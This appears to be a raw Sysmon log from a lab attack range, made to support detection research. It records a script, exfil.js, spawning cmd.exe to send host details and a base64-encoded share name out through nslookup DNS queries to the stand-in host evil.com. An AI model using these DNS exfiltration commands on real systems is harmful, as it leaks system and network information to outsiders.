14:16:04.093{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.101{2E1864BB-17A4-629A-883D-000000005F02}5908C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrwemmy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000193890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.092{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldfh.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.056{2E1864BB-17A3-629A-863D-000000005F02}59367240C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-873D-000000005F02}7536C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.040{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.040{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.040{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.040{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.040{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-873D-000000005F02}7536C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.040{2E1864BB-17A3-629A-853D-000000005F02}23887712C:\Windows\system32\cmd.exe{2E1864BB-17A4-629A-873D-000000005F02}7536C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.051{2E1864BB-17A4-629A-873D-000000005F02}7536C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A3-629A-853D-000000005F02}2388C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldfh.tmp 2>&1 10341000x8000000000000000193881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.009{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A3-629A-863D-000000005F02}5936C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.009{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A3-629A-863D-000000005F02}5936C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.993{2E1864BB-17A3-629A-863D-000000005F02}59367240C:\Windows\system32\conhost.exe{2E1864BB-17A3-629A-853D-000000005F02}2388C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000043907Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:03.684{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52320-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x800000000000000043906Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:05.339{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43E8E7CC113C75F0023F3D10A4A24142,SHA256=86E489A949409D98EDA6E7853956B43CFF29AE9709CCEAF0C5A97398571DF51F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.961{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A5-629A-B63D-000000005F02}4224C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.961{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A5-629A-B63D-000000005F02}4224C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.946{2E1864BB-17A5-629A-B63D-000000005F02}42246248C:\Windows\system32\conhost.exe{2E1864BB-17A5-629A-B53D-000000005F02}7888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.931{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-B63D-000000005F02}4224C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.931{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.931{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.931{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.931{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.931{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-B53D-000000005F02}7888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.931{2E1864BB-17A1-629A-783D-000000005F02}5552652C:\Windows\System32\WScript.exe{2E1864BB-17A5-629A-B53D-000000005F02}7888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.931{2E1864BB-17A5-629A-B53D-000000005F02}7888C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllhzmpl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.915{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhpglh.tmpMD5=72212EBDCB2E8E793A1B2134D4FA7DE3,SHA256=B332410D88A2D1B397F1BE63E741050D785B52E6644B4C66DB2FEDBE9A959973,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.863{2E1864BB-17A5-629A-B33D-000000005F02}69603732C:\Windows\system32\conhost.exe{2E1864BB-17A5-629A-B43D-000000005F02}5108C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.847{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.847{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.847{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.847{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-B43D-000000005F02}5108C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 